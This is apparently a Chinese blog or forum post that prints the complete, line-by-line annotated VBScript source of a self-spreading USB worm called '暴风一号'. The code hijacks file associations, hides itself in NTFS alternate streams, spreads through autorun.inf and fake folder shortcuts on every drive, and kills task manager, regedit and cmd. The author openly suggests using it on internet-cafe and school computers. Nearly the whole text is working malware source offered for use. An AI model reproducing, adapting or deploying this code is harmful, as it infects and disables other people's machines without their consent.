Sub RegSet() On Error Resume Next Dim RegPath1 , RegPath2, RegPath3, RegPath4 RegPath1="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/NOHIDDEN/CheckedValue" RegPath2="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" RegPath3="HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun" RegPath4="HKEY_CLASSES_ROOT/lnkfile/IsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4) End Sub
这个我们可以利用啊!特别是对于网吧,学校这种公共场所的电脑,让它自动运行你的软甲你。O(∩_∩)O哈哈~
算了不说了,估计很多看客就知道第一种 修改桌面图图标上的小鼠标吧!
下面贴出真个病毒的源代码加注释:需要的自行研究,病毒都是宝贝啊,都是编程中的精品!
On Error Resume Next '//屏蔽出错信息,发生错误时继续向下执行 Dim Fso,WshShell '//定义了两个变量 '//创建并返回对 Automation 对象的引用。 '//CreateObject(servername.typename [, location]) '//servername 必选项。提供对象的应用程序名称。 '//typename 必选项。要创建的对象类型或类。 '//location 可选项。对象所在的网络服务器将被创建。 '//说明Automation 服务器至少提供一种对象类型。例如,字处理应用程序可以提供应用程序对象、文档对象和工具条对象。 Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT") '//为变量Fso赋值 创建 Scripting.FileSystemObject 对象 提供对计算机文件系统的访问 Set WshShell=CreateObject("wScRipT.SHelL") '//为变量WshShell赋值 创建Wscript.Shell对象 用于获取系统环境变量的访问、创建快捷方式、访问Windows的特殊文件夹, '//以及添加或删除注册表条目。还可以使用Shell对象的功能创建更多的定制对话框以进行用户交互。 Call Main() '//call 将控制权传递到sub或function Sub Main() '//sub、function 两种表示方法 sub没有返回值,function有返回值 On Error Resume Next Dim Args, VirusLoad, VirusAss Set Args=WScript.Arguments '//返回wsh对象的参数集 VirusLoad=GetMainVirus(1) '//获得System文件夹下smss.exe 蠕虫地址 VirusAss=GetMainVirus(0) '//获得Windows文件夹下explorer.exe 蠕虫地址 ArgNum=0 Do While ArgNum < Args.Count Param=Param&" "&Args(ArgNum) ArgNum=ArgNum + 1 Loop SubParam=LCase(Right(Param, 3)) '//LCase 返回字符串的小写形式 Right 从字符串右边返回指定数目的字符 Select Case SubParam '//select类似switch Case "run" '//当运行run时,同时启动病毒文件 RunPath=Left(WScript.ScriptFullName, 2) '//ScriptFullName属性返回当前正在运行的脚本的完整路径。该属性返回一个只读的字符串。 Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "txt", "log","ini" ,"inf" '//运行"txt", "log", "ini", "inf"后缀名文件时,同时启动病毒文件 RunPath="%SystemRoot%/system32/NOTEPAD.EXE "&Param Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "bat", "cmd" '//运行"bat", "cmd"批处理或命令提示符时,同时启动病毒文件 RunPath="CMD /c echo Hi!I'm here!&pause" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "reg" '//运行"reg"注册表导入程序时,同时启动病毒文件 RunPath="regedit.exe "&""""&Trim(Param)&"""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "chm" '//运行"chm"帮助文件时,同时启动病毒文件 RunPath="hh.exe "&""""&Trim(Param)&"""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "hlp" '//运行"hlp"帮助文件时,同时启动病毒文件 RunPath="winhlp32.exe "&""""&Trim(Param)&"""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "dir" '//运行dir命令,同时启动病毒文件 RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&"""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "oie" '//打开我IE图标,同时启动病毒文件 RunPath="""%ProgramFiles%/Internet Explorer/IEXPLORE.EXE""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "omc" '//打开我的电脑图标,同时启动病毒文件 RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case "emc" '//劫持Win+E RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%/system/svchost.exe "&VirusLoad) Case Else If PreDblInstance=True Then '//如果条件满足,退出脚本宿主 WScript.Quit End If Timeout = Datediff("ww", GetInfectedDate, Date) - 12 If Timeout>0 And Month(Date) = Day(Date) Then Call VirusAlert() Call MakeJoke(CInt(Month(Date))) End If Call MonitorSystem() End Select End Sub '//监视系统 结束taskmgr.exe、regedit.exe、msconfig.exe、cmd.exe Sub MonitorSystem() On Error Resume Next Dim ProcessNames, ExeFullNames ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe") VBSFullNames=Array(GetMainVirus(1)) '//变量赋值 Do Call KillProcess(ProcessNames) '//如发现变量中的进程,调用结束进程函数 Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)) '// smss.exe 蠕虫地址 explorer.exe 蠕虫地址 Call KeepProcess(VBSFullNames) '//保持病毒进程 WScript.Sleep 3000 '//脚本宿主等待时间为3000毫秒=3秒 Loop End Sub '//侵入系统 Sub InvadeSystem(VirusLoadPath,VirusAssPath) On Error Resume Next Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version Load_Value=""""&VirusLoadPath&"""" '//smss.exe的病毒流 File_Value="%SystemRoot%/System32/WScript.exe "&""""&VirusAssPath&""""&" %1 %* " '// explorer.exe 蠕虫 IE_Value="%SystemRoot%/System32/WScript.exe "&""""&VirusAssPath&""""&" OIE " '// 打开ie 蠕虫 MyCpt_Value1="%SystemRoot%/System32/WScript.exe "&""""&VirusAssPath&""""&" OMC " '//打开我的电脑 蠕虫 MyCpt_Value2="%SystemRoot%/System32/WScript.exe "&""""&VirusAssPath&""""&" EMC " '//劫持Win+E 蠕虫 HCULoad="HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Load" HCUVer="HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Ver" HCUDate="HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Date" VirusCode=GetCode(WScript.ScriptFullName) Version=1 HostSourcePath=Fso.GetSpecialFolder(1)&"/Wscript.exe" HostFilePath=Fso.GetSpecialFolder(0)&"/system/svchost.exe" For Each Drive In Fso.Drives '//分别建立各个目录的病毒名字 If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs" Call CreateAutoRun(Drive.DriveLetter,DiskVirusName) '//创建自动运行 Call InfectRoot(Drive.DriveLetter,DiskVirusName) '//感染 End If Next If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then If GetFileSystemType(GetSystemDrive())="NTFS" Then '//判断是否为NTFS分区 Call CreateFile(VirusCode,VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) '//这一步创建了流文件 Call CopyFile(HostSourcePath,HostFilePath) '//这一步将wscript.exe从system32复制到system目录并改名svchost.exe Call SetHiddenAttr(HostFilePath) Else '//FAT32格式 Call CreateFile(VirusCode, VirusAssPath) Call SetHiddenAttr(VirusAssPath) Call CreateFile(VirusCode,VirusLoadPath) Call SetHiddenAttr(VirusLoadPath) Call CopyFile(HostSourcePath, HostFilePath) Call SetHiddenAttr(HostFilePath) End If End If If ReadReg(HCULoad)<>Load_Value Then '//改写注册表启动项,smss.exe的流 Call WriteReg (HCULoad, Load_Value, "") End If If GetVersion() < Version Then '//改写版本信息为1 Call WriteReg (HCUVer, Version, "") End If If GetInfectedDate() = "" Then Call WriteReg (HCUDate, Date, "") '//记录感染时间 End If '//以下更改许多文件关联,病毒的通用感染方式 If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/")<>File_Value Then Call SetTxtFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/inifile/shell/open/command/")<>File_Value Then Call SetIniFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/inffile/shell/open/command/")<>File_Value Then Call SetInfFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/batfile/shell/open/command/")<>File_Value Then Call SetBatFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/cmdfile/shell/open/command/")<>File_Value Then Call SetCmdFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>File_Value Then Call SetRegFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>File_Value Then Call SetchmFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>File_Value Then Call SethlpFileAss(VirusAssPath) End If If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/Applications/iexplore.exe/shell/open/command/")<>IE_Value Then Call SetIEAss(VirusAssPath) End If If ReadReg("HKEY_CLASSES_ROOT/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command/")<>IE_Value Then Call SetIEAss(VirusAssPath) End If If ReadReg("HKEY_CLASSES_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell/open/command/")<>MyCpt_Value1 Then Call SetMyComputerAss(VirusAssPath) End If If ReadReg("HKEY_CLASSES_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell/explore/command/")<>MyCpt_Value2 Then Call SetMyComputerAss(VirusAssPath) End If Call RegSet() End Sub '//拷贝文件 Sub CopyFile(source, pathf) On Error Resume Next If FSO.FileExists(pathf) Then FSO.DeleteFile pathf , True End If FSO.CopyFile source, pathf End Sub '//创建文件 Sub CreateFile(code, pathf) On Error Resume Next Dim FileText If FSO.FileExists(pathf) Then Set FileText=FSO.OpenTextFile(pathf, 2, False) FileText.Write code FileText.Close Else Set FileText=FSO.OpenTextFile(pathf, 2, True) FileText.Write code FileText.Close End If End Sub '//注册表设置 Sub RegSet() On Error Resume Next Dim RegPath1 , RegPath2, RegPath3, RegPath4 RegPath1="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/NOHIDDEN/CheckedValue" RegPath2="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" RegPath3="HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun" RegPath4="HKEY_CLASSES_ROOT/lnkfile/IsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4) End Sub '//结束进程 Sub KillProcess(ProcessNames) On Error Resume Next Set WMIService=GetObject("winmgmts://./root/cimv2") For Each ProcessName in ProcessNames Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ") For Each Process in ProcessList IntReturn=Process.terminate If intReturn<>0 Then WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False End If Next Next End Sub '//删掉autorun.inf免疫目录 Sub KillImmunity(D) On Error Resume Next ImmunityFolder=D&":/Autorun.inf" If Fso.FolderExists(ImmunityFolder) Then WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True '//提权 WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True '//rd命令删除,配合 /s /q 选项,很轻松 End If End Sub '//保护病毒进程 保持脚本进程持续运行,少于2个创建新进程 Sub KeepProcess(VBSFullNames) On Error Resume Next For Each VBSFullName in VBSFullNames If VBSProcessCount(VBSFullName) < 2 then Run("%SystemRoot%/system/svchost.exe "&VBSFullName) End If Next End Sub '//获得系统分区 c: '//FileSystemObject.GetSpecialFolder 返回指定特殊文件夹 '//WindowsFolder 0 Windows 文件夹,包含 Windows 操作系统安装的文件。 '//SystemFolder 1 System 文件夹,包含库、字体和设备驱动程序文件。 '//TemporaryFolder 2 Temp 文件夹,用于保存临时文件。可以在 TMP 环境变量中找到该文件夹的路径。 '//Left 返回指定数目的从字符串的左边算起的字符。 Function GetSystemDrive() GetSystemDrive=Left(Fso.GetSpecialFolder(0),2) End Function '//FileSystemObject.GetDrive返回与指定的路径中驱动器相对应的 Drive 对象。Drive 提供对磁盘驱动器或网络共享的属性的访问。 '//Drive.FileSystem返回指定的驱动器使用的文件系统的类型。 Function GetFileSystemType(Drive) Set d=FSO.GetDrive(Drive) GetFileSystemType=d.FileSystem End Function '//读取注册表建值 返回所在路径 Function ReadReg(strkey) Dim tmps Set tmps=CreateObject("WScript.Shell") ReadReg=tmps.RegRead(strkey) Set tmps=Nothing End Function '//重写注册表键值 Sub WriteReg(strkey, Value, vtype) Dim tmps Set tmps=CreateObject("WScript.Shell") If vtype="" Then tmps.RegWrite strkey, Value Else tmps.RegWrite strkey, Value, vtype End If Set tmps=Nothing End Sub '//删除注册表键值 Sub DeleteReg(strkey) Dim tmps Set tmps=CreateObject("WScript.Shell") tmps.RegDelete strkey Set tmps=Nothing End Sub '//设置隐藏属性 Sub SetHiddenAttr(path) On Error Resume Next Dim vf Set vf=FSO.GetFile(path) Set vf=FSO.GetFolder(path) vf.Attributes=6 '// 6=2+4 分别是隐藏、系统属性 End Sub '//执行ExeFullName指定的文件 Sub Run(ExeFullName) On Error Resume Next Dim WshShell Set WshShell=WScript.CreateObject("WScript.Shell") WshShell.Run ExeFullName Set WshShell=Nothing End Sub '//感染根目录 Sub InfectRoot(D,VirusName) On Error Resume Next Dim VBSCode VBSCode=GetCode(WScript.ScriptFullName) VBSPath=D&":/"&VirusName If FSO.FileExists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) End If Set Folder=Fso.GetFolder(D&":/") '//隐藏根目录下的所有子目录 Set SubFolders=Folder.Subfolders For Each SubFolder In SubFolders SetHiddenAttr(SubFolder.Path) LnkPath=D&":/"&SubFolder.Name&".lnk" '//创建对应的快捷方式 TargetPath=D&":/"&VirusName Args=""""&D&":/"&SubFolder.Name& "/Dir""" If Fso.FileExists(LnkPath)=False Or GetTargetPath(LnkPath) <> TargetPath Then If Fso.FileExists(LnkPath)=True Then FSO.DeleteFile LnkPath, True End If Call CreateShortcut(LnkPath,TargetPath,Args) End If Next End Sub '//上一步失败了调用这个函数创建快捷方式 Sub CreateShortcut(LnkPath,TargetPath,Args) Set Shortcut=WshShell.CreateShortcut(LnkPath) with Shortcut .TargetPath=TargetPath .Arguments=Args .WindowStyle=4 .IconLocation="%SystemRoot%/System32/Shell32.dll, 3" .Save end with End Sub '//创建autorun.inf文件 Sub CreateAutoRun(D,VirusName) On Error Resume Next Dim InfPath, VBSPath, VBSCode InfPath=D&":/AutoRun.inf" VBSPath=D&":/"&VirusName VBSCode=GetCode(WScript.ScriptFullName) If FSO.FileExists(InfPath)=False Or FSO.FileExists(VBSPath)=False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) StrInf="[AutoRun]"&VBCRLF&"Shellexecute=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell/open=打开(&O)"&VBCRLF&"shell/open/command=WScript.exe "&VirusName&" ""AutoRun"""&VBCRLF&"shell/open/Default=1"& VBCRLF&"shell/explore=资源管理器(&X)"&VBCRLF&"shell/explore/command=WScript.exe "&VirusName&" ""AutoRun""" Call KillImmunity(D) Call CreateFile(StrInf, InfPath) Call SetHiddenAttr(InfPath) End If End Sub '//改变txt格式文件关联 Sub SetTxtFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变ini格式文件关联 Sub SetIniFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/inifile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变inf格式文件关联 Sub SetInfFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/inffile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变bat格式文件关联 Sub SetBatFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/batfile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变cmd格式文件关联 Sub SetCmdFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/cmdfile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变hlp格式文件关联 Sub SethlpFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变reg格式文件关联 Sub SetRegFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//改变chm格式文件关联 Sub SetchmFileAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/", Value, "REG_EXPAND_SZ") End Sub '//篡改IE启动设置 Sub SetIEAss(sFilePath) On Error Resume Next Dim Value Value="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" OIE " Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/Applications/iexplore.exe/shell/open/command/", Value, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command/", Value, "REG_EXPAND_SZ") End Sub '//改变我的电脑的打开关联,包括Win+E Sub SetMyComputerAss(sFilePath) On Error Resume Next Dim Value1,Value2 Value1="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" OMC " Value2="%SystemRoot%/System32/WScript.exe "&""""&sFilePath&""""&" EMC " Call WriteReg("HKEY_CLASSES_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell/", "", "REG_SZ") Call WriteReg("HKEY_CLASSES_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell/open/command/", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT/CLSID/{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell/explore/command/", Value2, "REG_EXPAND_SZ") End Sub '//获得系统驱动盘符名 Drive.SerialNumber 盘符序列号 c-->驱动器 C: - 固定<BR>序列号:-1598325125、d-->驱动器 D: - 固定<BR>序列号:237835280、e、f。 Function GetSerialNumber(Drv) On Error Resume Next Set d=fso.GetDrive(Drv) GetSerialNumber=d.SerialNumber '// 返回十进制序列号,用于唯一标识一个磁盘卷。Select Case d.DriveType Case 0: t = "未知" Case 1: t = "可移动" Case 2: t = "固定" '// Case 3: t = "网络" Case 4: t = "CD-ROM" Case 5: t = "RAM 磁盘" End Select GetSerialNumber=Replace(GetSerialNumber,"-","") End Function '//获得蠕虫病毒路径 &表示字符串相加 GetSpecialFolder 返回指定的特殊文件夹 Function GetMainVirus(N) On Error Resume Next MainVirusName=GetSerialNumber(GetSystemDrive())&".vbs" If GetFileSystemType(GetSystemDrive())="NTFS" Then If N=1 Then '//System 文件夹,包含库、字体和设备驱动程序文件。 SystemFolder GetMainVirus=Fso.GetSpecialFolder(N)&"/smss.exe:"&MainVirusName '//返回 如c:/windows/system32/smss.exe:72161642.vbs End If If N=0 Then '//Windows 文件夹,包含 Windows 操作系统安装的文件。 WindowsFolder GetMainVirus=Fso.GetSpecialFolder(N)&"/explorer.exe:"&MainVirusName '//返回 如c:/windows/explorer.exe:72161642.vbs End If Else GetMainVirus=Fso.GetSpecialFolder(N)&"/"&MainVirusName End If End Function '//返回指定路径vbs脚本的运行个数 Function VBSProcessCount(VBSPath) On Error Resume Next Dim WMIService, ProcessList, Process VBSProcessCount=0 Set WMIService=GetObject("winmgmts://./root/cimv2") Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessList If InStr(Process.CommandLine, VBSPath)>0 Then VBSProcessCount=VBSProcessCount+1 End If Next End Function '//'用来计数wscript进程的个数,如果大于等于3个那么返回True Function PreDblInstance() On Error Resume Next PreDblInstance=False If VBSProcessCount(WScript.ScriptFullName)>= 3 Then PreDblInstance=True End If End Function '//获取快捷方式的vbs脚本地址 Function GetTargetPath(LnkPath) On Error Resume Next Dim Shortcut Set Shortcut=WshShell.CreateShortcut(LnkPath) GetTargetPath=Shortcut.TargetPath End Function '//读取文件 返回 TextStream Function GetCode(FullPath) On Error Resume Next Dim FileText Set FileText=FSO.OpenTextFile(FullPath, 1) '//打开指定的文件并返回一个 TextStream 对象,可以读取、写入此对象或将其追加到文件。 '// 1 以只读模式打开文件。不能对此文件进行写操作。 GetCode=FileText.ReadAll '//读入全部 TextStream 文件并返回结果字符串 FileText.Close End Function '//获得注册表 版本键值 获取windows版本 Function GetVersion() Dim VerInfo VerInfo="HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Ver" If ReadReg(VerInfo)="" Then GetVersion=0 Else GetVersion=CInt(ReadReg(VerInfo)) '//CInt 返回表达式,此表达式已被转换为 Integer 子类型的 Variant。 End If End Function '//网页文件BFAlert.hta Sub VirusAlert() On Error Resume Next Dim HtaPath,HtaCode HtaPath=Fso.GetSpecialFolder(1)&"/BFAlert.hta" HtaCode="<HTML><HEAD><TITLE>暴风一号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>"&VBCRLF&"<font style=""font-size:200%;font-family:黑体;color=red"">暴风一号 </font>"&VBCRLF&"</DIV></BODY></HTML>" If FSO.FileExists(HtaPath)=False Then Call CreateFile(HtaCode, HtaPath) '//创建网页文件BFAlert.hta Call SetHiddenAttr(HtaPath) '//设置隐藏 End If Call Run(HtaPath) End Sub '//获得感染注册表时间键 Function GetInfectedDate() On Error Resume Next Dim DateInfo DateInfo="HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Date" If ReadReg(DateInfo)="" Then GetInfectedDate="" Else GetInfectedDate=CDate(ReadReg(DateInfo)) End If End Function '//弹出光驱 Sub MakeJoke(Times) On Error Resume Next Dim WMP, colCDROMs Set WMP = CreateObject( "WMPlayer.OCX" ) '//创建WMPlayer.OCX插件对象 Set colCDROMs = WMP.cdromCollection '//系统中光驱 If colCDROMs.Count >0 Then For i=1 to Times colCDROMs.Item(0).eject() '//退出抽取式设备 WScript.Sleep 3000 colCDROMs.Item(0).eject() Next End If Set WMP = Nothing End Sub |